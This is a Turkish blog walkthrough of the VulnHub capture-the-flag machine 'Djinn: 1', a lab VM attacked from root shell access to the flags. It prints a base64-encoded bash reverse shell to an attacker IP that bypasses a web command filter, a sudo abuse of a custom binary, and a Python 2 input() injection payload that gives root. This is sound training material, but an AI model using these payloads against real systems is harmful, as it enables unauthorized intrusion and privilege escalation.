İçeriğe geç

DJINN: 1

Makine Hakkında Bilgiler

Açıklama:
Level: Beginner-Intermediate
flags: user.txt and root.txt
Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux

Vulnhub Sayfası:
https://www.vulnhub.com/entry/djinn-1,397/

İndirme Sayfası:
https://download.vulnhub.com/djinn/djinn.ova

Walkthrough

Makineyi tespit ederek başlayalım.

┌──(root💀kali)-[~]
└─# arp-scan -l | grep "System"
192.168.101.23  08:00:27:32:ac:8f   PCS Systemtechnik GmbH

┌──(root💀kali)-[~]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.101.24  netmask 255.255.255.0  broadcast 192.168.101.255
        inet6 fe80::a00:27ff:fe8b:5efb  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:8b:5e:fb  txqueuelen 1000  (Ethernet)
        RX packets 36  bytes 3542 (3.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 525  bytes 32536 (31.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

nmap taraması ile devam edelim.

[*] Scan: 142
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-05 16:46 EDT
Nmap scan report for 192.168.101.23
Host is up (0.00091s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.101.24
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b8:cb:14:15:05:a0:24:43:d5:8e:6d:bd:97:c0:63:e9 (RSA)
|   256 d5:70:dd:81:62:e4:fe:94:1b:65:bf:77:3a:e1:81:26 (ECDSA)
|_  256 6a:2a:ba:9c:ba:b2:2e:19:9f:5c:1c:87:74:0a:25:f0 (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   NULL: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|     '-', 1)
|   RPCCheck: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|_    '-', 5)
7331/tcp open  http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.91%I=7%D=7/5%Time=60E36F95%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x
SF:20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20_
SF:_\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x
SF:20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x2
SF:0`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x
SF:20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x
SF:20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\
SF:nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20y
SF:ou\x20your\x20gift\.\n\(4,\x20'-',\x201\)\n>\x20")%r(RPCCheck,1BC,"\x20
SF:\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\x2
SF:0__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\x2
SF:0\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\x2
SF:0\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20
SF:\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\|\
SF:x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\__
SF:_\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x20
SF:see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x20
SF:my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20your\
SF:x20gift\.\n\(3,\x20'-',\x205\)\n>\x20");
MAC Address: 08:00:27:32:AC:8F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.91 ms 192.168.101.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.57 seconds

ftp anonymous açık. Hemen oraya gidip neler olduğuna bakalım. Daha sonrasında 7331 ile ilgileneceğim. Birde 1337'de yazılmış bir uygulama var. Bu uygulamaya nc ile bağlandığınızda size sürekli matematiksel işlemler sorduğunu göreceksiniz. Basit bir soket app yazarak sunucudan gelen verileri parse ederek aslında 1000 tane soruyu cevaplayabiliriz. En azından böyle düşünüyordum ancak yapamadım 🙂 Uzun süre üstünde uğraştıktan sonra pes edip diğper servislerle ilgilenmeye başladım. Nasıl yapamadım kendime şaşıyoum çünkü benzer bir uygulamayı localimde yazıp localimde test ettiğimde çalışıyor. İşin garibi makineyi çözdükten sonra bu makineden sadece 1 dakika içerisinde root haklarında nasıl işlem yapabiliriz bunu göstereceğim. Gerçekten ince düşünülmüş ve bilgi isteyen bir makine...

┌──(root💀kali)-[~/oscp/dji]
└─# ftp 192.168.101.23 
Connected to 192.168.101.23.
220 (vsFTPd 3.0.3)
Name (192.168.101.23:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
-rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.01 secs (0.8682 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.00 secs (64.9688 kB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.01 secs (9.7977 kB/s)
ftp> exit
221 Goodbye.

┌──(root💀kali)-[~/oscp/dji]
└─# ls
creds.txt  game.txt  message.txt

┌──(root💀kali)-[~/oscp/dji]
└─# cat creds.txt 
nitu:81299

┌──(root💀kali)-[~/oscp/dji]
└─# cat game.txt 
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the 
final level and get the prize.

┌──(root💀kali)-[~/oscp/dji]
└─# cat message.txt 
@nitish81299 I am going on holidays for few days, please take care of all the work. 
And don't mess up anything.

Evet sanırım bazı kullanıcılar elde etmiş olabiliriz ancak eminde değilim. Dediğim gibi 1337'deki oyunla ilgili bir notumuz var ayrıca. Şimdi http'ye odaklanalım.

┌──(root💀kali)-[~/oscp/dji]
└─# gobuster dir --url http://192.168.101.23:7331  --follow-redirect --status-codes-blacklist "404" --no-error --threads 50 --wordlist /usr/share/wordlists/dirb/big.txt -x php,html,sql,zip,bak,sql,txt,php5,py,rar,7z,log,cgi --expanded  | tee gobusterKucukNOSlash 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.101.23:7331
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              rar,7z,php,html,sql,zip,txt,py,bak,php5,log,cgi
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/07/05 17:05:16 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.101.23:7331/genie                (Status: 200) [Size: 1676]
http://192.168.101.23:7331/wish                 (Status: 200) [Size: 385] 

===============================================================
2021/07/05 17:32:48 Finished
===============================================================

Evet gobuster'ın --add-slash'lı olmayan taramasında bazı sonuçlar aldık. Tarayıcıda bunları incelediğimde bir web shell olduğunu anladım. İncelemeler sonucunda aağıdaki şekilde filtrelenmiş web shell'i bypass edip, reverse alabildim.

http://192.168.101.23:7331/wish adresinde yaptığım işlem tp://192.168.101.23:7331/genie adresinde sonuç buluyor.

┌──(root💀kali)-[~/oscp/dji]
└─# echo "bash -i >& /dev/tcp/192.168.101.24/1822 0>&1" | base64 
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS4yNC8xODIyIDA+JjEK

┌──(root💀kali)-[~/oscp/dji]
└─# echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS4yNC8xODIyIDA+JjEK" | base64 -d | bash

echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS4yNC8xODIyIDA+JjEK" | base64 -d | bash payload'ını hedef sunucuda çalıştırdım.

┌──(root💀kali)-[~/oscp/dji]
└─# nc -lvp 1822                                                                                                                                                                                                                        130 ⨯
listening on [any] 1822 ...
192.168.101.23: inverse host lookup failed: Unknown host
connect to [192.168.101.24] from (UNKNOWN) [192.168.101.23] 39600
bash: cannot set terminal process group (660): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@djinn:/opt/80$ 

www-data@djinn:/opt/80$ whoami
whoami
www-data
www-data@djinn:/opt/80$ 

İçeride biraz gezindikten sonra aşağıdakileri buldum.

www-data@djinn:/opt/80$ ls
ls
app.py  app.pyc  static  templates
www-data@djinn:/opt/80$ 

www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess

from flask import Flask, redirect, render_template, request, url_for

app = Flask(__name__)
app.secret_key = "key"

CREDS = "/home/nitish/.dev/creds.txt"

RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]

def validate(cmd):
    if CREDS in cmd and "cat" not in cmd:
        return True

    try:
        for i in RCE:
...
www-data@djinn:/opt/80$ cat /home/nitish/.dev/creds.txt
cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9
www-data@djinn:/opt/80$ 

www-data@djinn:/opt/80$ 

www-data@djinn:/opt/80$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9

nitish@djinn:/opt/80$ whoami
whoami
nitish

Yeni kullanıcı ilede bazı inceleme işlemleri gerçekleştirdim.

sudo -l
Matching Defaults entries for nitish on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nitish may run the following commands on djinn:
    (sam) NOPASSWD: /usr/bin/genie

İnternet üzerinde böyle yaygın bir binary bulamadım. Bunun üzerine CTF için özel hazırlandığını düşündüm ve incelemeye başladım.

nitish@djinn:/opt/80$ strings /usr/bin/genie | wc
strings /usr/bin/genie | wc
    758     958   12118
nitish@djinn:/opt/80$ 

nitish@djinn:/opt/80$ /usr/bin/genie -h
/usr/bin/genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish

I know you've came to me bearing wishes in mind. So go ahead make your wishes.

positional arguments:
  wish                  Enter your wish

optional arguments:
  -h, --help            show this help message and exit
  -g, --god             pass the wish to god
  -p SHELL, --shell SHELL
                        Gives you shell
  -e EXEC, --exec EXEC  execute command
nitish@djinn:/opt/80$ 

nitish@djinn:/opt/80$ strings /usr/bin/genie | nl | grep shell
strings /usr/bin/genie | nl | grep shell
   331  Gives you shell
   341  shell
   356  --shell
   469  __pyx_kp_u_Gives_you_shell
   480  __pyx_n_s_shell_2
   499  __pyx_kp_u_shell
   519  __pyx_n_u_shell_2
   542  __pyx_k_Gives_you_shell
   595  __pyx_k_shell
   596  __pyx_k_shell_2

Parametreleri doğru kullanamıyordum, bunun üzerine incelemeye başladım. cmd diye bir parametre buldum ancak daha sonrasında belki vardır diye man dokümanına baktım. Ordada cmd parametresinden bahsediyordu.

nitish@djinn:/opt/80$ man /usr/bin/genie
man /usr/bin/genie
WARNING: terminal is not fully functional
-  (press RETURN) 

man(8)                          genie man page                          man(8)

NAME
       genie - Make a wish

SYNOPSIS
       genie [-h] [-g] [-p SHELL] [-e EXEC] wish

DESCRIPTION
       genie would complete all your wishes, even the naughty ones.

       We  all  dream  of getting those crazy privelege escalations, this will
       even help you acheive that.

OPTIONS
       wish

              This is the wish you want to make .

       -g, --god

              Sometime we all would like to make a wish to  god,  this  option
              let you make wish directly to God;r q to quit)
 Manual page genie(8) line 2 (press h for help or q to quit) 

              Though  genie can't gurantee you that your wish will be heard by
              God, he's a busy man you know;

       -p, --shell

              Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"

       -e, --exec

              Execute command on someone else computer is just too  damn  fun,
              but this comes with some restrictions.

       -cmd

              You know sometime all you new is a damn CMD, windows I love you.

SEE ALSO
       mzfr.github.io

BUGS
       There  are  shit  loads  of bug in this program, it's all about finding
       one.

Bunun üzerine...

nitish@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nitish may run the following commands on djinn:
    (sam) NOPASSWD: /usr/bin/genie
nitish@djinn:/opt/80$ 

nitish@djinn:/opt/80$ 

nitish@djinn:/opt/80$ sudo -u sam /usr/bin/genie -cmd ls
sudo -u sam /usr/bin/genie -cmd ls
my man!!
$ whoami
whoami
sam
$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
sam@djinn:/opt/80$ 

Harika! Şimdi sam ile ilgili araştırmalar yapmaya başlayalım.

sam@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
    (root) NOPASSWD: /root/lago
sam@djinn:/opt/80$ 

sam@djinn:/opt/80$ 

sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100: 
Enter your number: __import__("os").system("/bin/bash")
__import__("os").system("/bin/bash")
root@djinn:/opt/80# id
id
uid=0(root) gid=0(root) groups=0(root)
root@djinn:/opt/80# cd /root
cd /root
root@djinn:/root# ls
ls
lago  proof.sh
root@djinn:/root# cat proof.sh
cat proof.sh
#!/bin/bash

clear

figlet Amazing!!!

echo djinn pwned...

echo __________________________________________________________________________

echo

echo "Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc"

echo Path: $(pwd)

echo Date: $(date)

echo Whoami: $(whoami)

echo __________________________________________________________________________

echo

echo "By @0xmzfr"

echo ""

echo "Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)"

echo ""

root@djinn:/root# ./proof.sh    
./proof.sh
'unknown': I need something more specific.
    _                        _             _ _ _ 
   / \   _ __ ___   __ _ ___(_)_ __   __ _| | | |
  / _ \ | '_ ` _ \ / _` |_  / | '_ \ / _` | | | |
 / ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/   \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
                                     |___/       
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Tue Jul 6 03:15:59 IST 2021
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

Aslında biraz şanstı. Uzun denemeler sonucu python2 input bug düşündüm ve denedim. Buradaki __import__("os").system("/bin/bash") payload'ı tam belki anlamamış olabilirsiniz. Bunun için size şimdi bir hap video önereceğim. (https://www.youtube.com/watch?v=YrxPtozTCI8)
Şimdi gelelim acıklı hikayeye eğer aklıma ilk seferde bu gelseydi 1337'de çalışan uygulamada direkt root olabilirdik...

┌──(root💀kali)-[/home/kali/Documents/tool/enum]
└─# nc 192.168.101.23 1337
  ____                        _____ _                
 / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___ 
| |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
 \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|

Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(1, '+', 6)
> __import__("os").system("id; hostname")
uid=0(root) gid=0(root) groups=0(root)
djinn
Wrong answer

Sağlık olsun... 🙂

Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir